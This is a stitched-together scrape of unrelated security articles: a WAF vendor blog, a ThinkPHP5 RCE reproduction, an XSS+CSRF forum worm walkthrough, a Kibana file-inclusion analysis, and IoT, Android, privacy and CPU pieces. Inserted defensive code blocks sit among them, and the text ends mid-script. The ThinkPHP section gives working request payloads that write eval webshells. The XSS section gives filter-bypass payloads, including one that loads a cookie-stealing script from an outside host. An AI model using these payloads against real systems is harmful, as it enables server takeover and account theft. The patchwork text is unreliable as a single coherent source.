The reality is that data science and machine learning should be extremely tangible to your organization. Most enterprises are generating far more data than their analysts could ever analyze. By 2020, it’s estimated that for every person on earth, 1.7MB of data will be created every second. That’s staggering. This trend is particularly true in security, with threat feeds, intelligence, endless reputation lists, IOCs, signatures, and more being constantly updated. Additionally, threats are constantly adapting to avoid detection: moving IP addresses, repacking their payloads, obfuscating their attack code. The combined result is that security teams have more data than they can manually analyze, and the adversaries are evolving too fast to keep up with. This is a real-world, practical case for new analytical models.

You’ll notice that I didn’t jump to just saying this is a use case for machine learning. Machine learning is a great tool, and it’s one we use. But it doesn’t have to be the only tool. Sometimes good old-fashioned statistical analysis can be very effective. K-means clustering is a great example. To me, k-means doesn’t really qualify as machine learning, but it can be incredibly useful at identifying groups within a large data set. That information can then be used to inform a risk engine of what group a session matches; in our case, that might be normal, abnormal or malicious. The point really isn’t to brag about k-means per se, but rather to remind ourselves not to get overly attached to certain terms. In the same way that the term AI can be oversold, sometimes “statistics” is undersold. If it solves a problem and helps us get answers out of our data and make better decisions, then we want to use it.

And this is ultimately where any use of data science in security reaches its moment of truth. Is the technology able to make trustworthy decisions that reduce the workload on security staff? This need is particularly true at the WAF, where for years, organizations have relied on human effort to tune signatures and rules, only to still deal with false positives and false negatives.

We are solving this problem at ThreatX. We aren’t doing it with a magical black box algorithm. We use a variety of techniques that are right for their respective jobs and that work together for a final answer. We use machine learning to train algorithms on massive amounts of attack data. We profile applications to understand their normal behavior and find deviations. We apply statistical analysis, active deception, threat intelligence, and other techniques as well. We use all of these components with a simple goal in mind: building a WAF that does its job and actually defends your organization. A WAF that reduces work for your security team so you can actually defend all of your applications and APIs. And that is something that I think is both exciting and very practical.

ThinkPHP5 RCE Vulnerability: Reproduction and Analysis

I. Overview

Recently ThinkPHP released a security update that fixes an RCE vulnerability usable to get a shell. Because $controller is not effectively filtered, an attacker can use the namespace form of a class name to call methods of arbitrary classes and thereby get a shell.

II. Affected versions

5.x < 5.1.31
5.x < 5.0.23

as well as CMSes built on top of ThinkPHP5, such as the AdminLTE admin system, thinkcmf, ThinkSNS, etc.

A quick Shodan search:

III. Reproduction

win7 + thinkphp5.1.24

(1) Run phpinfo

/index.php/?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1

(2) Write a one-line webshell

/index.php/?s=index/\think\template\driver\file/write&cacheFile=zxc0.php&content=<?php @eval($_POST[xxxxxx]);?>
debian + thinkphp5.1.30

(1) Run phpinfo

/index.php/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1

(2) Write a one-line webshell

/index.php/?s=index/\think\template\driver\file/write&cacheFile=zxc0.php&content=<?php @eval($_POST[xxxxxx]);?>
win7 + thinkphp5.0.16

(1) Run phpinfo

/index.php/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1

(2) Write a one-line webshell

/index.php/?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=zxc1.php&vars[1][]=<?php @eval($_POST[xxxxxx]);?>
IV. Remediation

1. Update directly via git/composer
2. Manual fix

Version 5.1

In the parseUrl method of the think\route\dispatch\Url class, after the controller has been parsed, add:

if ($controller && !preg_match('/^[A-Za-z](\w|\.)*$/', $controller)) {
    throw new HttpException(404, 'controller not exists:' . $controller);
}

Version 5.0

In the module method of the think\App class, after the code that obtains the controller, add:

if (!preg_match('/^[A-Za-z](\w|\.)*$/', $controller)) {
    throw new HttpException(404, 'controller not exists:' . $controller);
}

If you get a 404 after the change, try modifying the regex to also allow \/:

if (!preg_match('/^[A-Za-z\/](\w|\.)*$/', $controller)) {

V. Vulnerability analysis

ThinkPHP 5.1.24

Let's look at the patch first:


A filter was added on the controller name.

Look at the route dispatch:

Module.php:83

public function exec()
{
    // listen for module_init
    $this->app['hook']->listen('module_init');
    try {
        // instantiate the controller
        $instance = $this->app->controller($this->controller,
            $this->rule->getConfig('url_controller_layer'),
            $this->rule->getConfig('controller_suffix'),
            $this->rule->getConfig('empty_controller'));
    } catch (ClassNotFoundException $e) {
        throw new HttpException(404, 'controller not exists:' . $e->getClass());
    }
    ......
    $data = $this->app->invokeReflectMethod($instance, $reflect, $vars);
    return $this->autoResponse($data);
});

$instance = $this->app->controller

instantiates the controller so that its method can be called.

Look at the controller method

App.php:719

public function controller($name, $layer = 'controller', $appendSuffix = false, $empty = '')
{
list($module, $class) = $this->parseModuleAndClass($name, $layer, $appendSuffix);
if (class_exists($class)) {
return $this->__get($class);
} elseif ($empty && class_exists($emptyClass = $this->parseClass($module, $layer, $empty, $appendSuffix))) {
return $this->__get($emptyClass);
}
throw new ClassNotFoundException('class not exists:' . $class, $class);
}

list($module, $class) = $this->parseModuleAndClass($name, $layer, $appendSuffix);

parseModuleAndClass parses $name into a module and a class, and the class is then instantiated.

Look at that method, line 640

protected function parseModuleAndClass($name, $layer, $appendSuffix)
{
if (false !== strpos($name, '\\')) {
$class = $name;
$module = $this->request->module();
} else {
if (strpos($name, '/')) {
list($module, $name) = explode('/', $name, 2);
} else {
$module = $this->request->module();
}
$class = $this->parseClass($module, $layer, $name, $appendSuffix);
}
return [$module, $class];
}

As you can see, if $name contains a backslash, then:

$class = $name;
$module = $this->request->module();
……
return [$module, $class];

$name is used directly as the class name. Since fully qualified namespaces contain backslashes, a namespaced name can be used to instantiate an arbitrary class.
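A log-side check for the request shape analysed above and for the remediation regex: it extracts the route the way parseUrlPath() does and applies the controller regex from the patch. This is an added JavaScript example, neither the article's code nor ThinkPHP's; the access log lines are constructed, the request paths in them are the ones shown earlier, and the module/controller/action layout is assumed.

```javascript
// Added example (not ThinkPHP's code or the article's): flag requests whose
// controller segment would fail the check the 5.1 patch adds. The access log
// lines are constructed; the request paths in them are the article's. Assumes
// the multi-module "module/controller/action" layout.

// Regex the patch adds in Url::parseUrl (PCRE and JS agree on \w here).
const CONTROLLER_RE = /^[A-Za-z](\w|\.)*$/;

// Mirror of Rule::parseUrlPath(): unify '|' to '/', trim, split on '/'.
function parseUrlPath(url) {
  let u = url.replace(/\|/g, '/');
  const q = u.indexOf('?');
  if (q !== -1) u = u.slice(0, q);          // the [path?params] form
  u = u.replace(/^\/+|\/+$/g, '');
  return u === '' ? [] : u.split('/');
}

// Query string -> object, last value wins like PHP's parse_str. ('+' is left
// as-is, which is enough for the separators this check looks at.)
function queryParams(target) {
  const params = {};
  const q = target.indexOf('?');
  if (q === -1) return params;
  for (const pair of target.slice(q + 1).split('&')) {
    const eq = pair.indexOf('=');
    const key = eq === -1 ? pair : pair.slice(0, eq);
    const raw = eq === -1 ? '' : pair.slice(eq + 1);
    let val;
    try { val = decodeURIComponent(raw); } catch (e) { val = raw; }
    params[key] = val;
  }
  return params;
}

// The route string: the `s` parameter (var_pathinfo) if present, otherwise
// the PATH_INFO that follows index.php.
function routeOf(target) {
  const s = queryParams(target).s;
  if (typeof s === 'string' && s !== '') return s;
  const pathPart = target.split('?')[0];
  const i = pathPart.indexOf('index.php');
  return i === -1 ? pathPart : pathPart.slice(i + 'index.php'.length);
}

// Controller segment under module/controller/action.
function controllerOf(target) {
  const segs = parseUrlPath(routeOf(target));
  return segs.length >= 2 ? segs[1] : (segs[0] || '');
}

// Same condition as the patch: a non-empty controller that fails the regex.
function isSuspiciousRequest(target) {
  const c = controllerOf(target);
  return c !== '' && !CONTROLLER_RE.test(c);
}

// Constructed access log lines (combined log format).
const SAMPLE_LOG = [
  '10.0.0.5 - - [11/Dec/2018:10:00:01 +0000] "GET /index.php/?s=index/\\think\\Container/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1 HTTP/1.1" 200 3120',
  '10.0.0.5 - - [11/Dec/2018:10:00:02 +0000] "GET /index.php/?s=index/\\think\\template\\driver\\file/write&cacheFile=zxc0.php&content=test HTTP/1.1" 200 12',
  '10.0.0.7 - - [11/Dec/2018:10:00:03 +0000] "GET /index.php/index/index/hello HTTP/1.1" 200 87',
  '10.0.0.5 - - [11/Dec/2018:10:00:04 +0000] "GET /index.php/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1 HTTP/1.1" 200 3120',
];

// Scan log lines; returns { index, controller, target } for each hit.
function scanAccessLog(lines) {
  const hits = [];
  lines.forEach((line, index) => {
    const m = line.match(/"(?:GET|POST|HEAD) (\S+) HTTP\//);
    if (!m) return;
    if (isSuspiciousRequest(m[1])) {
      hits.push({ index, controller: controllerOf(m[1]), target: m[1] });
    }
  });
  return hits;
}
```

The check mirrors the patch's condition exactly, so a route that the patched framework would reject with a 404 is the one the scan reports.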

Now let's see how $name, i.e. $controller, can be controlled.

Look at route parsing, i.e. how the URL is parsed

Url.php:37

protected function parseUrl($url)
{
$depr = $this->rule->getConfig('pathinfo_depr');
$bind = $this->rule->getRouter()->getBind();
if (!empty($bind) && preg_match('/^[a-z]/is', $bind)) {
$bind = str_replace('/', $depr, $bind);
// if there is a module/controller binding
$url = $bind . ('.' != substr($bind, -1) ? $depr : '') . ltrim($url, $depr);
}
list($path, $var) = $this->rule->parseUrlPath($url);
if (empty($path)) {
return [null, null, null];
}

list($path, $var) = $this->rule->parseUrlPath($url);

parseUrlPath() is called; let's follow it

Look at Rule.php:947

public function parseUrlPath($url)
{
    // replace the separator so that route definitions use a uniform separator
    $url = str_replace('|', '/', $url);
    $url = trim($url, '/');
    $var = [];
    if (false !== strpos($url, '?')) {
        // [module/controller/action?]param1=value1&param2=value2...
        $info = parse_url($url);
        $path = explode('/', $info['path']);
        parse_str($info['query'], $var);
    } elseif (strpos($url, '/')) {
        // [module/controller/action]
        $path = explode('/', $url);
    } elseif (false !== strpos($url, '=')) {
        // param1=value1&param2=value2...
        $path = [];
        parse_str($url, $var);
    } else {
        $path = [$url];
    }
    return [$path, $var];
}

The URL is split on / to get each part; nothing is filtered.

Let's see how the URL is obtained:

Request.php:716

/**
 * Get the pathinfo of the current request URL (without the URL suffix)
 * @access public
 * @return string
 */
public function path()
{
    if (is_null($this->path)) {
        $suffix   = $this->config['url_html_suffix'];
        $pathinfo = $this->pathinfo();
        if (false === $suffix) {
            // pseudo-static access disabled
            $this->path = $pathinfo;
        } elseif ($suffix) {
            // strip the normal URL suffix
            $this->path = preg_replace('/\.(' . ltrim($suffix, '.') . ')$/i', '', $pathinfo);
        } else {
            // allow access with any suffix
            $this->path = preg_replace('/\.' . $this->ext() . '$/i', '', $pathinfo);
        }
    }
    return $this->path;
}

Note line 31 of that file:

// PATHINFO variable name, used for compatibility mode

'var_pathinfo' => 's',

So the route can be passed either via pathinfo or via the s parameter.

// Windows replaces \ in pathinfo with /, so using s is recommended

In summary, a payload can be constructed such as:

Technical discussion | Notes on an XSS worm penetration test


*Original author: 莫妮卡k37. This article is part of the CodeSec original content reward program; reproduction without permission is prohibited.

Overall approach

1. A stored XSS was found in the post content field.

2. Craft the content of a post (the mother post) to insert a CSRF PoC whose output is a 302 permanent redirect to the infected mother post.

3. Every user who views this page automatically publishes a child post that redirects to the infected mother post; the redirect to the mother post runs the PoC in it again and creates yet another child post.

That is the overall idea of building a worm from XSS + CSRF. Below, each step is worked through in detail. My skill level is not high; this is meant as next-step material for XSS beginners.

I. Stored XSS

1. Go to the new-post page, add an initial test payload, and view the source:


2. Observed that mixed case bypasses the filter, so construct the payload (where parentheses are blocked, ’ can be used instead):

<sCrIpt>alert'xss'</sCrIpt>

3. Refresh the page and observe the effect: the alert pops successfully:


4. Insert a JS script and use an XSS platform to steal user cookies; this is the most common way XSS is exploited.

POC: <sCRiPt/SrC=//60.wf/m5VP>

The SRC points to a short URL whose content is a JS script that steals user cookies; an XSS platform can generate it automatically:

II. Initial test of XSS combined with CSRF

1. First verify whether CSRF exists: on the new-post page, fill in a title and content, click publish and capture the request:


2. Use Burp's built-in CSRF PoC generator: on the POST request, right-click -> Generate CSRF PoC -> save -> send the PoC using another account, then check your own posts and find that a new post was published successfully.

3. Write the JS script (Xss'or can be used to generate it)


4. CSRF + stored XSS: insert the script into the page:


As shown, the content is the JS script that publishes a new post; clicking publish creates the new post.

5. View this post; a success message appears:


6. You can see it was published successfully:


7. Test by viewing the post as another user: that user likewise unknowingly publishes a new post. At this point the XSS + CSRF attack is complete:

III. Building the worm

Let's organize the idea once more.

The precondition for the worm is that the content of the child post, i.e. the post published by a user who views our infected mother post, is controllable:

1. The attacker creates an attack post (the mother post) whose JS script (1) creates a child callback post and (2) makes the child callback post's content a redirect to the mother post.
2. A user views the mother post and automatically creates a child callback post.
3. The child callback post 403-redirects to the mother post.
4. Based on that content, another child callback post is created.
5. Users view each other's posts, it fans out and spreads, and so on, resulting in a worm attack.

1. Publish any new post:


2. Record the post's URL and click edit:


3. Insert the JS script, which makes the child callback post 302-redirect to the mother post's URL.

payload: <embed/src=/bang.duia.com/web/normal/topic/806440>

This inserts a new page into the page, and that new page is the mother post.


4. After publishing, browse it; a child callback post has been generated:


5. Open the child callback post and find the frame constructed by the mother post's JS script:


6. In Firefox, unfortunately, it did not succeed. Opening the Network panel showed the following message, meaning an invalid CORS (cross-origin resource sharing) request. My guess is that this is a whitelist block that restricts where JS may be loaded from:


7. It runs in IE:


8. Key point!! None of the above is the most important part: this is an app, so users mostly use it on their phones. Viewing the post on the phone later successfully redirected through the child callback URL to the mother post and created a new child callback post. Although the website may have a WAF, and IE on the desktop can worm, it turned out that the app side had no protection at all and it could spread directly.
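The two weaknesses the experiment chains, a case-sensitive tag blacklist and a post-creation endpoint that accepts requests from any page, side by side with the fixes that close them. This is an added JavaScript example, not part of the original article or the forum it tested; the forum origin and the request shape are assumptions, while the payloads are the article's own.

```javascript
// Added example (not the article's or the forum's code). Shows why the
// blacklist the article bypassed fails, what correct output encoding does,
// and a server-side origin + token check that would have stopped the CSRF
// half of the worm. Forum origin and request shape are assumptions.

// Payloads from the article, used here as constructed sample post bodies.
const SAMPLE_POSTS = [
  "<sCrIpt>alert'xss'</sCrIpt>",                          // case mixing
  "<sCRiPt/SrC=//60.wf/m5VP>",                            // '/' instead of space
  "<embed/src=/bang.duia.com/web/normal/topic/806440>",   // embeds the mother post
];

// Naive blacklist of the kind the experiment defeated: exact, lowercase,
// space-separated patterns. Everything in SAMPLE_POSTS passes through it.
function naiveFilter(html) {
  return html
    .replace(/<script>/g, '')
    .replace(/<\/script>/g, '')
    .replace(/<script src=/g, '')
    .replace(/<embed src=/g, '');
}

// Correct defence for untrusted text rendered into an HTML body: encode the
// characters that can change the parsing context. The browser then renders
// the payload as literal text and never creates an element.
function escapeHtml(text) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(text).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Does the string still contain something an HTML parser opens a tag for?
// Any letter after '<' starts a tag, and '/' after the tag name is treated
// like whitespace, which is why <sCRiPt/SrC=...> works.
function containsTag(html) {
  return /<\/?[a-z]/i.test(html);
}

// The CSRF half: the worm relied on the site accepting a post-creation POST
// that a victim's browser issued on another page's behalf. Reject requests
// whose Origin (or Referer origin) is not the forum itself, and require a
// per-session token in the body. `req` is an assumed shape: { headers, body }.
function isCsrfSafe(req, sessionToken, siteOrigin) {
  const headers = req.headers || {};
  let origin = headers.origin;
  if (!origin && headers.referer) {
    origin = headers.referer.split('/').slice(0, 3).join('/');
  }
  if (origin !== siteOrigin) return false;
  const token = req.body && req.body.csrf_token;
  return typeof token === 'string' && token.length > 0 && token === sessionToken;
}

// Run every sample payload through both filters and report what survives.
function compareFilters(posts = SAMPLE_POSTS) {
  return posts.map((p) => ({
    payload: p,
    survivesBlacklist: containsTag(naiveFilter(p)),
    survivesEscaping: containsTag(escapeHtml(p)),
  }));
}
```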


Analysis of the Local File Inclusion Vulnerability in Kibana, Elasticsearch's Core Plugin (CVE-2018-17246)


Not long ago Elasticsearch published a security advisory: the Console plugin in Elasticsearch Kibana versions before 6.4.3 and before 5.6.13 contains a serious local file inclusion vulnerability that can lead to denial of service, arbitrary file read and, in combination with a third-party application, a reverse shell. Below, the author analyzes and reproduces the vulnerability's background, attack principle and behavior.

I. Affected scope

Elasticsearch Kibana is an open-source, browser-based analytics and search dashboard for Elasticsearch from the Dutch company Elasticsearch. As a core component of Elasticsearch, Kibana can be offered as a product or a service and works with various systems, products, websites and the other Elastic Stack products used in enterprises. Because Kibana is widely used in big data, the vulnerability's impact is broad; the Shodan search results are shown below.

II. Vulnerability scenarios

The author used Kibana-6.1.1-linux-x86_64.tar.gz; the setup is not described here, as there are many references online.

2.1 Denial of service

For denial of service the author chose /cli_plugin/index.js for the demonstration; the attack vector is as follows:

After the GET request is sent, the client can no longer open the application page; on the server the Kibana process exits and the service goes down, as shown below.
2.2 Arbitrary file read

For the file read the author chose /etc/passwd for the demonstration; the attack vector is as follows:

After the GET request is sent, the client page throws a 500 error, and on the server side the contents of passwd that were read are thrown in the error, as shown below.
2.3 Combined with a third-party application

Kibana is usually deployed alongside other applications. If one of those applications can upload or write JavaScript files, an attacker can create a reverse shell through Node.js, with content as follows:

Path traversal lets the attacker reach the location of any file on the Kibana server, as follows:
A listening nc receives the interactive session.
III. Vulnerability analysis

The taint point is in \src\core_plugins\console\api_server\server.js

The value taken from apis is assigned to the parameter name. As the figure shows, the content of the name variable is passed into require without any filtering. In Node.js, require is the mechanism for loading modules: it can load a core module such as the built-in "http", or a file or a directory containing a file named "index.js"; if the argument begins with "/", "./" or "../", the function knows that the module is a file or a folder. Let's continue into api.js, where the asJson function lives.
In the same directory, ES_5_0.js has an exported instance of this class.
To summarize, the normal flow of this function is to take the name of a JavaScript file that exports an API class instance and call its asJson function, but validation is omitted, so an arbitrary file can be specified; combined with directory traversal, this allows arbitrary file read on the Kibana server. Based on the analysis above, a Node.js application obviously requires a large number of files; if any of those files contains a process.exit call, requiring it could shut down the Kibana process and cause denial of service. Searching turned up three possible attack vectors.
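The unfiltered require(name) pattern described above beside a validated loader, as an added JavaScript example that is not Kibana's own code; the base directory, the allowlist of module names and the sample request values are constructed for the example, and the traversal targets are the ones the scenarios above use.

```javascript
// Added example (not Kibana's code): a module loader that mirrors the pattern
// described above, where a request-controlled `apis` value reaches require(),
// beside a validated version. The base directory and allowlist are assumed;
// the request values are the ones the article's scenarios use.

// Where the console API server's files are assumed to live.
const API_DIR = '/opt/kibana/src/core_plugins/console/api_server';

// API modules the server legitimately knows about (constructed allowlist;
// the article mentions ES_5_0.js as one such file).
const KNOWN_APIS = new Set(['es_5_0', 'es_6_0']);

// Minimal POSIX path resolution (no `path` module, so the block runs anywhere):
// joins base and name and collapses '.' and '..' segments.
function resolveUnder(baseDir, name) {
  const out = [];
  for (const seg of (baseDir + '/' + name).split('/')) {
    if (seg === '' || seg === '.') continue;
    if (seg === '..') out.pop();
    else out.push(seg);
  }
  return '/' + out.join('/');
}

// Vulnerable shape: the client-supplied name is handed to the loader as-is.
// Returns the path require() would look up, without actually loading it.
function resolveApiVulnerable(name) {
  return resolveUnder(API_DIR, name);
}

// Validated shape: reject anything that is not a bare identifier, anything
// outside the allowlist, and (defence in depth) any resolved path that does
// not stay under API_DIR.
function resolveApiSafe(name) {
  if (typeof name !== 'string') throw new TypeError('api name must be a string');
  if (!/^[A-Za-z0-9_]+$/.test(name)) {
    throw new Error('rejected api name: ' + JSON.stringify(name));
  }
  if (!KNOWN_APIS.has(name)) throw new Error('unknown api: ' + name);
  const resolved = resolveUnder(API_DIR, name + '.js');
  if (!resolved.startsWith(API_DIR + '/')) throw new Error('path escapes api dir');
  return resolved;
}

function isAcceptedApiName(name) {
  try { resolveApiSafe(name); return true; } catch (e) { return false; }
}

// Classify a list of request values: where the vulnerable loader would end
// up, and whether the validated loader accepts the name at all.
function classifyRequests(names) {
  return names.map((n) => ({
    name: n,
    vulnerableResolvesTo: resolveApiVulnerable(n),
    accepted: isAcceptedApiName(n),
  }));
}
```

Note that the identifier check alone already stops both traversal and core-module names such as "http"; the allowlist and the prefix check are there so that a later change to one check cannot silently reopen the hole.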
IV. A brief summary

LFI usually appears in PHP applications; this time the same require pattern shows up in a Node.js program, and more Node.js programs with this problem will surely appear in the future. Local inclusion vulnerabilities have existed for many years, yet many developers and architects still do not consider them. This article illustrates a critical LFI vulnerability in Kibana that lets an attacker run local code on the server; the most direct harm is denial of service, which a production environment cannot afford, so Node.js LFI deserves attention.

V. References

https://github.com/appsecco/vulnerable-apps/tree/master/node-reverse-shell

https://www.elastic.co/downloads/kibana

http://www.cnvd.org.cn/flaw/show/CNVD-2018-23907

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-17246

*Author: Ivan1ee@360云影实验室. Please credit CodeSec.Net when reproducing.

IoT Bug Grants Access to Home Video Surveillance


Due to a shared Amazon S3 credential, all users of a certain model of the Guardzilla All-In-One Video Security System can view each other's videos.

A vulnerability in the Guardzilla All-In-One Video Security System, an IoT-enabled home video surveillance system, lets all users view one another's saved surveillance footage due to the design and implementation of Amazon S3 credentials inside the camera's firmware.

Security researchers found the bug (CVE-2018-5560) during an event held by 0DayAllDay and reported it to Rapid7 for coordinated disclosure. Rapid7 published the flaw today, 60 days after it first attempted to contact the vendor. Multiple coordination efforts received no response.

This vulnerability is an issue of CWE-798: Use of Hard-coded Credentials, 0DayAllDay researchers report . Guardzilla's system uses a shared Amazon S3 credential for storing users' saved videos. When they investigated the access rights given to the embedded S3 credentials, researchers found they provide unlimited access to all S3 buckets provisioned for the account.

As a result, all people who use Guardzilla's system for home surveillance can view one another's video data in the cloud. Once the password is known, any unauthenticated person can access and download stored files and videos in buckets linked to the account.

Researchers only tested Model #GZ521W of the Guardzilla Security Video System and do not know whether other models are affected by the same bug, Rapid7 reports. Without a patch, users should ensure that the device's cloud-based data storage functions are turned off.

Read more details in Rapid7's blog here .


The new security features in Android Pie and why I’m excited about them


I gave a talk at the Google Developer Group Devfest 18 in Ankara about Android as I do every year. Quite likely this was the last talk I will give on Android. I talked about one of the big improvements in the latest version of Android. To me, this has been the most exciting Android improvement so far. There are lots of new security and feature updates in Android Pie, and I want to introduce them here briefly.

You can get my presentation here .

Restriction on the usage of mic or camera in the background

Apps won’t be able to use your mic or camera in the background with Android Pie. This is one of the most important security features coming with the new Android.



Apps will only be able to use your mic or camera if they are actively being used on screen. If you have any paranoia about some apps listening to you, you can be sure that no apps can listen to you secretly with Android Pie.

While this move prevents apps from listening to your conversations, Google will still be able to listen to you. ‘OK Google.’ :wink:

BTW no app will be able to use any other sensors besides the mic and camera.

New lockdown mode

When the fingerprint authentication was first introduced, it helped everyone. Do you know how many times an average human authenticates their mobile phone in a day? Yeah. Too many.

Here comes the trouble: there are many stories about how police or people with bad intentions could force you to unlock your phone with your fingerprint to search it. Anyone could force you to unlock your phone with your face id to gain access to your digital life (nowadays it’s your actual life).

You can disable fingerprint and face authentication in Android Pie by enabling the lockdown mode. Only your PIN, pattern, or password will work when it’s enabled. However, this feature will not be needed in your casual life. It’s just good to have for higher-risk situations.

HTTPS is the default for apps

Today most people are aware that websites which have a green locked key are secure enough to enter. You can search for that key in your browser. However, you can not know if the app you use makes calls to HTTPS services.

Any regular app sends data over the Internet. Any bad person may read this data you send unless it is encrypted. HTTPS guarantees that the transaction is encrypted. Android will force developers to send data over HTTPS to make sure that the data sent from your phone will be encrypted.

Restoring your device will require a passcode

With Android Pie, you will restore your device using your PIN or pattern or password. Fingerprint or face id has been enough to restore the device so far. However, this simplicity came with some vulnerability. A second auth layer has been introduced to restore your device more securely. Be aware that if you forget the PIN, you will not be able to restore your device.

The alert tone when your call is being recorded

There are many apps which can record calls. It has been a big vulnerability so far. There are two cases: any app can record your call, or someone you’re talking to can record the call.

Now if you record a call, an alert tone will be sent periodically to you and to the person you’re talking to. Android Pie ends this paranoia permanently.

I’ve tried to introduce significant new improvements in Android Pie with this post. While there are many more enhancements, these were the ones I found most important. Android Pie will be the most secure Android version ever.

Privacy &amp; Security: What Is the Difference?



When we discuss the internet today, there are two terms that we frequently hear: privacy and security. While you may think that these two terms mean the same thing and are thus interchangeable, this isn’t true. As such, you’ll want to take a moment to learn the difference between these two terms.

Understanding the Difference Between Privacy and Security

When you open a checking account you share your personal information with your bank. There are three results that may occur here:

1. The bank may maintain your privacy and security.

2. Your privacy may be compromised, but your security could still be maintained. This means that the bank might sell some of your information to a marketer, something you may agree to in the bank’s privacy disclosure. The result is that your personal information ends up in the hands of people you didn’t want to have it.

3. Both your privacy and your security are compromised by a data breach. Here cybercriminals penetrate the bank’s database, compromising your security. When this happens, your information could be sold on the dark web, causing you problems with cyber fraud and identity theft.

Norton says cybersecurity products can protect both your privacy and your security, though. Sometimes the software can even protect both at the same time, as is the case when you use a virtual private network (VPN). This is a security product that encrypts all the data you send or receive while online. Essentially, this is like sitting with your back to the wall so someone can’t look over your shoulder and see what you’re doing. There are two main ways in which this is beneficial to you:

Privacy: A VPN helps block websites, internet browsers, cable companies, and internet service providers (ISPs) from tracking your personal information, including your web browser history.

Security: A VPN will help protect you when others attempt to access your personal information online.

What We Need Security Against

Understanding the difference between security and privacy is the first step, but it may leave you wondering: What do we need security against? According to Tripwire, while there are hundreds of cyber threats we should take strict security measures against, the primary ones include:

Malicious software (a.k.a. malware) is one of the cybercriminals’ most effective weapons. They use it to infiltrate a target system or device. Once inside, the cybercriminal can steal your information, damage your system, modify or delete data, or create any other type of harm they want. The number of malware variants grows by leaps and bounds each year because this is such an effective weapon in the hands of cybercriminals. In fact, today this is the most common type of tool they deploy. Distributed denial-of-service attacks (a.k.a. DDoS) are used to paralyze your computer so that you can’t access it. This is done by creating a malicious botnet that infects any vulnerable systems that are on either a node or a network. Once deployed the cyber attacker will then order the botnet to continually send requests which the server can’t manage because there are simply too many of them. As such, the server is forced to go offline. One of the best-known examples of this happened in 2016. At that time Dyn (a well-known DNS provider) was hit by one of history’s largest DDoS attacks . Cyber attackers hit them at a rate of 1.2 terabits per second. Phishing is one of the oldest, yet most effective ways a cybercriminal can lure in their victim. It most commonly happens when you receive a fake email, but bogus websites and text messages are also being used today. The main goal of these attacks is to steal your personal and financial information. To date, these have been very successful, costing mid-size companies an estimated $1.6 million. Ransomware is one of the most sophisticated types of malware in existence today. Cybercriminals can use it to restrict your access to your personal information. While this may sound complicated, it’s as easy as being forced to pay a ransom demand if you want to regain access to your own personal information. The most common way cybercriminals can affect a target system is through a phishing attack. 
Most cybersecurity experts estimate that ransomware damages will reach around $11.5 billion by 2019.

Top Preventive Measures for Privacy and Security

You should only trust businesses or services that value your privacy. They can demonstrate that respect by using state-of-the-art technology to protect your private information. Of course, you must also take the time to understand the difference between security and privacy, and that understanding won't do you any good unless you employ some precautionary measures, such as threat intelligence software, to protect your privacy and prevent security breaches from happening. With this in mind, here are some steps you can start taking today.

Although it's common to share personal information on social media today, doing so puts your privacy at serious risk. Make sure you don't disclose everything about yourself online (or even offline), and take a moment to check that the privacy settings on your social profiles are set to "private."

Don't click on links inside emails that come from unknown senders. These are typically phishing attacks, which means the links lead to malicious sites or downloads.

Make sure all your devices are protected (patched, with security software enabled) so that it is difficult for cybercriminals to get inside and plant malicious tools.

Consider using a VPN. A VPN encrypts your traffic in transit, so someone watching the network cannot read it. Note the limit of that protection: it does nothing for data on a device that has already been compromised.

Avoid public Wi-Fi where you can. Such networks often lack basic security measures, which makes them more prone to eavesdropping and breaches.

Always read the terms of service and privacy policy when you buy a product or subscribe to a service online. They tell you what information is being collected and how it is used. If you're in Europe

AnandTech Year in Review 2018: CPUs


When Ryan initially asked me to write a roundup of the year’s news on CPUs, I laughed. There has been a lot going on this year, from processor releases and reviews, to security issues, to discussions about the next few years of computing. However a couple of weeks ago I wrote a script to pull every AnandTech article out of our archive to filter into my own database for analysis. It turns out that the AT staff between us have written just shy of 200 news articles and longer format reviews about CPUs this year, and here are the highlights.

When discussing CPUs, at least in the desktop market, our attention focuses on two companies in particular: Intel and AMD.

January: Security and CES

The start of the year typically begins with the big CES trade show in Las Vegas, but before we even got to that point, news broke about two new classes of vulnerabilities affecting most modern processors: Spectre and Meltdown. This was significant because the two names covered a new family of microarchitectural vulnerabilities derived from the base design of modern processors, exploiting some of the tricks (speculative and out-of-order execution) used to speed up common day-to-day tasks. The news broke about a week earlier than the companies intended under the coordinated (responsible) disclosure timeline, although the big players had around six months' notice to prepare fixes after Google's Project Zero first discovered the issues in 2017. These vulnerabilities were a common thread through 2018 (and still are today), as companies put forward a mix of software and firmware fixes for hardware in the wild, built security assurance teams, and put research towards hardware fixes for future products. Essentially every high-performance processor ever made, from Intel, AMD, ARM, and POWER, is thought to be vulnerable at some level, and every major company made an official statement on the issue. Software and firmware fixes for several generations of processors came out through 2018, and new products that block some of these attacks arrived in the latter stage of 2018, although 2019 is where it gets more serious. Some of these fixes cause performance regressions in certain tasks, mostly enterprise workloads, and this topic will be at the forefront of every 2019-2020 CPU launch.
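For readers who want to check which of those software and firmware fixes are actually active on a given Linux machine: the kernel (since 4.15) exposes one file per issue under /sys/devices/system/cpu/vulnerabilities/, each holding a short status string such as "Not affected", "Mitigation: PTI" or "Vulnerable: ...". The script below is an added example, not part of the AnandTech article, that parses those strings, lists the issues that still need attention, and catches the caveat a practitioner cares about: a "Mitigation:" line can still end in "SMT vulnerable", meaning the fix does not cover the sibling hyperthread. The sample strings embedded in it are constructed for the example; on a real machine it reads the live sysfs directory instead.

```python
"""Summarize Spectre/Meltdown-family mitigation status from the Linux sysfs interface.

Added example. The kernel (since 4.15) exposes one file per issue under
/sys/devices/system/cpu/vulnerabilities/, each holding a short status string.
"""
from pathlib import Path

SYSFS_DIR = Path("/sys/devices/system/cpu/vulnerabilities")

# Constructed sample in the kernel's own format; a real machine will differ.
SAMPLE_SYSFS = {
    "meltdown": "Mitigation: PTI\n",
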